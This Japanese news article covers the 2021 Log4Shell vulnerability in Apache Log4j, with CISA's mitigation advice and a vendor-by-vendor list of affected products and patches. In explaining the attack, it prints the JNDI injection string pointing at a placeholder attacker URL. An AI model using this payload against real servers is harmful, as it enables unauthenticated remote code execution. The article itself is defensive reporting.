2021年12月9日、Apache Log4jのロギング・ライブラリに重大な脆弱性があるというニュースが流れ、概念実証済みの脆弱性が出現しはじめました。
Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションでエンタープライズレベルで使用されています。
Apacheは、Log4ShellまたはLogJamとも呼ばれる、現在CVE-2021-44228として追跡されている最大深刻度の脆弱性に対処するために、Log4j 2.15.0をリリースしました。
CloudflareとCisco Talosのデータによると、大規模な悪用が始まったのは、悪用コードが自由に利用できるようになってからですが、今月初めから攻撃が検出されています。
Log4Shellの欠陥は、11月24日にAlibabaのクラウドセキュリティチームによって報告されましたが、一部の攻撃者がなぜこれほど早く悪用できたのかは不明です。
Cybersecurity and Infrastructure Security Agency(CISA)のディレクターであるJen Easterly氏は、Log4Shellの脆弱性に関する土曜日の声明で、同機関が民間および公的セクターのパートナーと協力してこの問題に対処していると述べています。
Log4Shell は、Java Naming and Directory Interface (JNDI) インジェクションで、認証されないリモートでのコード実行を可能にします。攻撃者は、ブラウザのユーザーエージェントを次の形式の文字列に変更することで、これを利用することができます。
${jndi:ldap://[attacker_URL]}
この文字列は、被害者のWebサーバーのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックやリクエストを強制的に実行します。攻撃者は、この文字列を使用して、脆弱なマシンにエンコードされたコマンドやJavaクラスを渡すことができます。
CISAは本日、脆弱性の深刻さとその悪用が容易であることから、Log4Shell攻撃に対する防御を設定するための企業向けガイダンスを発表しました。同機関が推奨するのは、「利用可能なパッチを直ちに適用すること」であり、このプロセスに優先順位をつけることです。
パッチ適用が不可能な場合、同機関は以下の変更を推奨しています。
アプリケーションを起動する Java Virtual Machine コマンドに -Dlog4j2.formatMsgNoLookups=True という文字列を追加して log4j2.formatMsgNoLookups を true に設定する。
この場合、メッセージのフォーマットをルックアップに依存している場合、システムのロギングに影響を与える可能性があるという注意点があります。また、この緩和策はバージョン2.10以降にのみ有効です。
Log4Shellの詳細が判明した直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果について情報を提供しています。
Amazon
アマゾンは、いくつかの製品をアップデートし、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品もアップデート中であるか、近い将来に新しいバージョンをリリースする予定であると発表しました。
同社は、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどの影響を受けるサービスに関する詳細を発表している。
Atlassian
同社の評価によると、オンプレミス製品のデフォルト設定では、悪用されやすい脆弱性はないと考えています。
JMS Appender 機能を有効にするためにデフォルトのログ設定 (log4j.properties) を変更すると、Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible など一部の製品でリモートコード実行のリスクがもたらされる可能性があるそうです。
Broadcom
同社は、Log4jの脆弱性の影響を受ける複数のシマンテック製品について、緩和策とナレッジベースの記事を公開しました。CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれる。
Cisco
シスコは、Log4Shellの影響を受ける自社製品のリストと、12月14日から一部の製品にパッチを適用するカレンダーを公開しました。
影響を受ける製品は、以下のような様々なカテゴリーに分類されます。
- ネットワークおよびコンテンツセキュリティ機器(Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
- コラボレーションとソーシャルメディア(Cisco Webex Meetings Server)
- ネットワーク管理およびプロビジョニング(Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
- エンタープライズ ルーティングとスイッチング(Cisco Network Assurance Engine、Cisco SD-WAN vManage)
Citrix
調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、シトリックスは、Log4Shellの脆弱性がある製品としてリストアップしていません。
ConnectWise
同社のクラウドサービスであるPerchが、「潜在的な脆弱性を持つ」サードパーティーコンポーネントに依存していることが判明した、とConnectWise社のアドバイザリーには書かれています。
脆弱性のあるサードパーティは、ConnectWiseのStratoZenソリューションで使用されているFortiGuardのFortiSIEMと判明し、同社はホスティングされているStratoZenサーバーへのアクセスを一時的に制限するよう促されました。現在では、ほとんどのサービスへのアクセスが回復しています。
cPanel
フォーラムのスレッドによると、cPanelのSolrプラグインが存在するインスタンスのみが影響を受け、悪用される可能性があるが、ローカルにのみ存在するとのことです。
あるスタッフは、Log4Shellに対する緩和策を含むアップデートがcpanel-dovecot-solrパッケージに用意されていることを発表し、さらに安心感を与えてくれました。
Debian
Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), 12 (Bookworm) にセキュリティアップデートとして、パッチを適用した Log4j パッケージが追加されました、と勧告があります。
Docker
Docker Officialイメージの12個に、脆弱性のあるバージョンのLog4jライブラリが使用されていることが判明しています。couchbase、elasticsearch、logstash、sonarqube、solrが含まれる。
Dockerは、「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新中」であり、他の理由でイメージに脆弱性がない可能性があると述べている。
FortiGuard
同社からのアドバイザリーでは、約12の同社製品に脆弱性があるとされており、そのうち4つの製品についてはすでに修正または緩和措置が展開されているとのことです。
FortiGuardは、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなど他の製品の修正プログラム適用時期について、アドバイザリを更新すると発表している。
F-Secure
エフセキュアのいくつかの製品のWindows版とLinux版の両方がLog4Shellの影響を受けています。Policy Manager (Policy Manager Server コンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、および Elements Connector です。
同社は、この問題を修正するための管理者向けセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。
Ghidra
NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係を脆弱性のないイテレーションにアップグレードしています。
IBM
IBMのLog4Shellに関するアドバイザリによると、Admin ConsoleとUDDI Registry Applicationコンポーネント経由で、WebSphere Application Serverバージョン9.0と8.5のみが脆弱性の影響を受け、この問題は解決されているとのことです。
Juniper Networks
ネットワーク会社は、同社の4つの製品が影響を受けることを明らかにした。Paragon Active Assurance、Paragon Insights、Paragon Pathfinder、Paragon Plannerの4製品に影響があることを明らかにしました。
評価は継続中ですが、現段階ではさらに6つの製品が影響を受ける可能性があります。JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director (Security Director Insightsは除く)
McAfee
同社はまだ評価を完了しておらず、12製品を審査中であり、関連情報が入手でき次第、アドバイザリーを更新する予定です。
MongoDB
Log4Shellに対してパッチを適用する必要があるのはMongoDB Atlas Searchのみであると、本日更新されたアドバイザリーで同社は指摘しています。
開発元は、パッチを適用する前に悪用された証拠や侵害の指標を発見しなかったと付け加えています。
Okta
Oktaは、Log4Shellの脆弱性によるリスクを軽減するため、Okta RADIUS Server AgentおよびOkta On-Prem MFA Agentのアップデートをリリースし、お客様にアドミンコンソールからの修正プログラムの適用を強く推奨しています。
Oracle
オラクルによると、「いくつかの」自社製品が、どの製品が、いくつの製品が、脆弱性のあるバージョンのLog4jコンポーネントを使用していると公表していない。
同社は、顧客にMy Oracle Support Documentを紹介し、提供されるアップデートを "できるだけ早く "適用するよう強く推奨するセキュリティ警告を発表した。
OWASP Foundation
先日のアドバイザリで、Zed Attack Proxy (ZAP) ウェブアプリのスキャナ 2.11.1 以下のバージョンに、脆弱な Log4j コンポーネントが使用されていることが明らかになりました。
Red Hat
Red Hat は、複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けることを金曜日に明らかにし、利用可能になり次第、アップデートを適用するよう顧客に強く推奨しています。
勧告に記載されている製品は、Red Hat OpenShift 4および3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、Red Hat Fuse 7である。